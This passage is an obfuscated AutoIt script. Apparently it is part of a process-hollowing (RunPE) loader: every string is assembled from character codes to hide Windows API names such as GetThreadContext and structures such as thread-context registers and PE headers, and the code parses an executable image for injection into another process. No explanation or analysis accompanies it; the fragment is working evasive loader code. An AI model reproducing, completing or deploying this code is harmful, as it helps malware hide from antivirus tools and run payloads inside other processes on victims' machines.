	Local $cont12 = GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(69) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(68) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111)
	Local $cont13 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(100) & GetChr(105) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(115) & GetChr(105) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111)
	Local $cont14 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(98) & GetChr(120) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(100) & GetChr(120) & GetChr(59)
	Local $cont15 = GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(99) & GetChr(120) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(97) & GetChr(120) & GetChr(59)
	Local $cont16 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(98) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(105) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114)
	Local $cont17 = GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(67) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100)
	Local $cont18 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(115) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(83) & GetChr(115) & GetChr(59) & GetChr(98)
	Local $cont19 = GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(69) & GetChr(120) & GetChr(116) & GetChr(101) & GetChr(110) & GetChr(100) & GetChr(101) & GetChr(100) & GetChr(82) & GetChr(101) & GetChr(103) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(91) & GetChr(53) & GetChr(49) & GetChr(50) & GetChr(93)
	$context = sv1($cont1 & $cont2 & $cont3 & _
			$cont4 & $cont5 & $cont6 & $cont7 & $cont8 & $cont9 & $cont10 & _
			$cont11 & $cont12 & $cont13 & $cont14 & $cont15 & _
			$cont16 & $cont17 & $cont18 & $cont19)
EndIf
Local $fullcont
Switch $flag
	Case 1
		$fullcont = 0x10007
	Case 2
		$fullcont = 0x100007
	Case 3
		$fullcont = 0x80027
EndSwitch

#Region 5. READ PE-FORMAT
DllStructSetData($context, GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(120) & GetChr(116) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115), $fullcont)
$call = sv3($knl, $bo, GetChr(71) & GetChr(101) & GetChr(116) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(120) & GetChr(116), $ha, $handle2, $p2r, DllStructGetPtr($context))
If @error Or Not $call[0] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
EndIf
Local $peb
Switch $flag
	Case 1
		$peb = sv2($context, GetChr(69) & GetChr(98) & GetChr(120))
	Case 2
		$peb = sv2($context, GetChr(82) & GetChr(100) & GetChr(120))
	Case 3
		;none
EndSwitch
Local $head1 = GetChr(99) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(103) & GetChr(105) & GetChr(99) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(66) & GetChr(121) & GetChr(116)
Local $head2 = GetChr(101) & GetChr(115) & GetChr(79) & GetChr(110) & GetChr(76) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(80) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(115) & GetChr(59)
Local $head3 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(115) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114)
Local $head4 = GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(111) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100)
Local $head5 = GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(105) & GetChr(109) & GetChr(117) & GetChr(109) & GetChr(69) & GetChr(120) & GetChr(116) & GetChr(114) & GetChr(97) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(120) & GetChr(105) & GetChr(109)
Local $head6 = GetChr(117) & GetChr(109) & GetChr(69) & GetChr(120) & GetChr(116) & GetChr(114) & GetChr(97) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(83) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(80) & GetChr(59)
Local $head7 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(104) & GetChr(101) & GetChr(99) & GetChr(107) & GetChr(115) & GetChr(117) & GetChr(109) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(73) & GetChr(80) & GetChr(59) & GetChr(119) & GetChr(111)
Local $head8 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(83) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100)
Local $head9 = GetChr(32) & GetChr(79) & GetChr(118) & GetChr(101) & GetChr(114) & GetChr(108) & GetChr(97) & GetChr(121) & GetChr(59) & GetChr(99) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(100) & GetChr(91) & GetChr(56) & GetChr(93) & GetChr(59) & GetChr(119) & GetChr(111)
Local $head10 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(79) & GetChr(69) & GetChr(77) & GetChr(73) & GetChr(100) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(105) & GetChr(102) & GetChr(105) & GetChr(101) & GetChr(114) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(79)
Local $head11 = GetChr(69) & GetChr(77) & GetChr(73) & GetChr(110) & GetChr(102) & GetChr(111) & GetChr(114) & GetChr(109) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(99) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(115)
Local $head12 = GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(100) & GetChr(50) & GetChr(91) & GetChr(50) & GetChr(48) & GetChr(93) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114)
Local $head13 = GetChr(101) & GetChr(115) & GetChr(115) & GetChr(79) & GetChr(102) & GetChr(78) & GetChr(101) & GetChr(119) & GetChr(69) & GetChr(120) & GetChr(101) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114)
Local $header = sv1($head1 & $head2 & $head3 & $head4 & $head5 & $head6 & _
		$head7 & $head8 & $head9 & $head10 & $head11 & $head12 & $head13, $ptr)
Local $newheader = $ptr
$ptr += sv2($header, GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(79) & GetChr(102) & GetChr(78) & GetChr(101) & GetChr(119) & GetChr(69) & GetChr(120) & GetChr(101) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114))
Local $magic = sv2($header, GetChr(77) & GetChr(97) & GetChr(103) & GetChr(105) & GetChr(99))
If Not ($magic == GetChr(77) & GetChr(90)) Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
EndIf
Local $sig = sv1(GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(97) & GetChr(116) & GetChr(117) & GetChr(114) & GetChr(101), $ptr)
$ptr += 4
If sv2($sig, GetChr(83) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(97) & GetChr(116) & GetChr(117) & GetChr(114) & GetChr(101)) <> 17744 Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
EndIf
Local $ih1 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(99) & GetChr(104) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101)
Local $ih2 = GetChr(114) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(84) & GetChr(105) & GetChr(109) & GetChr(101) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(101) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(109) & GetChr(112) & GetChr(59)
Local $ih3 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(84) & GetChr(111) & GetChr(83) & GetChr(121) & GetChr(109) & GetChr(98) & GetChr(111) & GetChr(108) & GetChr(84) & GetChr(97) & GetChr(98) & GetChr(108) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119)
Local $ih4 = GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(121) & GetChr(109) & GetChr(98) & GetChr(111) & GetChr(108) & GetChr(115) & GetChr(59) & GetChr(119) & GetChr(111)
Local $ih5 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(79) & GetChr(112) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(97) & GetChr(108) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114)
Local $ih6 = GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(97) & GetChr(99) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(115)
Local $iheader = sv1($ih1 & $ih2 & $ih3 & $ih4 & $ih5 & $ih6, $ptr)
Local $numsecs = sv2($iheader, GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(115))
$ptr += 20
Local $magic2 = sv1(GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(103) & GetChr(105) & GetChr(99) & GetChr(59), $ptr)
Local $imagic2 = sv2($magic2, 1)
Local $opthead
If $imagic2 = 267 Then
	If $x64 Then

		sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	EndIf
	Local $opt1 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(103) & GetChr(105) & GetChr(99) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114)
	Local $opt2 = GetChr(76) & GetChr(105) & GetChr(110) & GetChr(107) & GetChr(101) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(77) & GetChr(105)
	Local $opt3 = GetChr(110) & GetChr(111) & GetChr(114) & GetChr(76) & GetChr(105) & GetChr(110) & GetChr(107) & GetChr(101) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114)
	Local $opt4 = GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122)
	Local $opt5 = GetChr(101) & GetChr(79) & GetChr(102) & GetChr(73) & GetChr(110) & GetChr(105) & GetChr(116) & GetChr(105) & GetChr(97) & GetChr(108) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(100) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
	Local $opt6 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(85) & GetChr(110) & GetChr(105) & GetChr(110)
	Local $opt9933 = GetChr(105) & GetChr(110) & GetChr(103) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
	Local $opt32523523 = GetChr(32) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(65) & GetChr(108) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(59)
	Local $opt7 = GetChr(105) & GetChr(116) & GetChr(105) & GetChr(97) & GetChr(108) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(100) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
	Local $4 = GetChr(108) & GetChr(101) & GetChr(65) & GetChr(108) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(59) & $2 & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(79) & GetChr(112) & GetChr(101) & GetChr(114) & GetChr(97) & GetChr(116)
	Local $3 = $opt32523523 & $1 & GetChr(32) & GetChr(70) & GetChr(105) & $4 & $opt9933
	Local $8 = GetChr(32) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(79) & GetChr(102) & GetChr(69) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(121) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(59)
	Local $9 = GetChr(32) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(59)
	Local $11 = GetChr(32) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
	Local $10 = GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(59)
	Local $13 = $1 & $8 & $1 & $9
	Local $12 = GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(79) & GetChr(112) & GetChr(101) & GetChr(114) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(110) & GetChr(103) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
	Local $14 = $1 & $11 & $1 & $10 & $1
	Local $opt8 = $13 & $14 & $3
	Local $15 = GetChr(111) & GetChr(114) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
	Local $17 = GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115)
	Local $18 = GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110)
	Local $19 = GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
	Local $binldna5 = GetChr(32) & GetChr(87) & GetChr(105) & GetChr(110) & GetChr(51) & GetChr(50) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(86) & GetChr(97) & GetChr(108) & GetChr(117) & GetChr(101) & GetChr(59)
	Local $binldna6 = GetChr(32) & GetChr(67) & GetChr(104) & GetChr(101) & GetChr(99) & GetChr(107) & GetChr(83) & GetChr(117) & GetChr(109) & GetChr(59) & $2 & GetChr(32) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(59) & $2 & GetChr(32) & GetChr(68) & GetChr(108)
	Local $binldna7 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(99) & GetChr(107) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(59)
	Local $binldna8 = $2 & $12 & $2 & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106)
	Local $binldna9 = $binldna8 & $15 & $2 & $17
	Local $16 = GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & $2 & $18
	Local $opt9 = $binldna9 & $16 & GetChr(59) & $2 & $19 & $1 & $binldna5
	Local $opt10var1 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(59)
	Local $opt10var2 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(59)
	Local $opt10var3 = GetChr(108) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(97) & GetChr(99) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(115)
	Local $opt10var4 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(99) & GetChr(107) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101)
	Local $opt10var5 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(59)
	Local $opt10var6 = $1 & $opt10var1 & $1 & $opt10var2 & $1
	Local $opt10var7 = GetChr(59) & $1 & $binldna7 & $1 & $opt10var5
	Local $opt10var8 = $binldna6 & $opt10var3 & GetChr(59) & $1 & $opt10var4
	Local $opt10 = $opt10var6 & $opt10var8 & $opt10var7
	Local $opt11var1 = GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(59)
	Local $opt11var2 = GetChr(32) & GetChr(76) & GetChr(111) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59)
	Local $opt11var3 = GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(82) & GetChr(118) & GetChr(97) & GetChr(65) & GetChr(110) & GetChr(100) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(115)
	Local $opt11var4 = $1 & $opt11var1 & $1 & $opt11var2
	Local $opt11var5 = $opt11var4 & $1 & $opt11var3
	Local $opt11 = $opt11var5
	$opthead = sv1($opt1 & $opt2 & $opt3 & $opt4 & $opt5 & $opt6 & $opt7 & $opt8 & $opt9 & $opt10 & $opt11, $ptr)
	$ptr += 96
ElseIf $imagic2 = 523 Then
	If Not $x64 Then
		sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	EndIf
	Local $opt1 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(103) & GetChr(105) & GetChr(99) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111)
	Local $opt2 = GetChr(114) & GetChr(76) & GetChr(105) & GetChr(110) & GetChr(107) & GetChr(101) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116)
	Local $opt3 = GetChr(101) & GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(76) & GetChr(105) & GetChr(110) & GetChr(107) & GetChr(101) & GetChr(114) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & GetChr(100)
	Local $opt4 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83)
	Local $opt5 = GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(73) & GetChr(110) & GetChr(105) & GetChr(116) & GetChr(105) & GetChr(97) & GetChr(108) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(100) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59) & GetChr(100) & GetChr(119)
	Local $opt6 = GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(85) & GetChr(110) & GetChr(105) & GetChr(110) & GetChr(105) & GetChr(116) & GetChr(105) & GetChr(97) & GetChr(108) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(100) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
	Local $opt7 = $1 & GetChr(32) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(79) & GetChr(102) & GetChr(69) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(121) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(59) & $1 & _
			GetChr(32) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(59) & $1 & _
			GetChr(32) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(65) & GetChr(108) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(59) & $1 & GetChr(32) & GetChr(70) & GetChr(105) & GetChr(108) & GetChr(101) & GetChr(65) & GetChr(108) & GetChr(105) & _
			GetChr(103) & GetChr(110) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(59) & $2 & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(79) & GetChr(112) & GetChr(101) & GetChr(114) & GetChr(97) & GetChr(116) & GetChr(105) & _
			GetChr(110) & GetChr(103) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & $2 & GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(79) & GetChr(112) & GetChr(101) & GetChr(114) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(110) & GetChr(103) & GetChr(83) & _
			GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
	Local $opt8 = $2 & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & $2 & GetChr(32) & GetChr(77) & GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & _
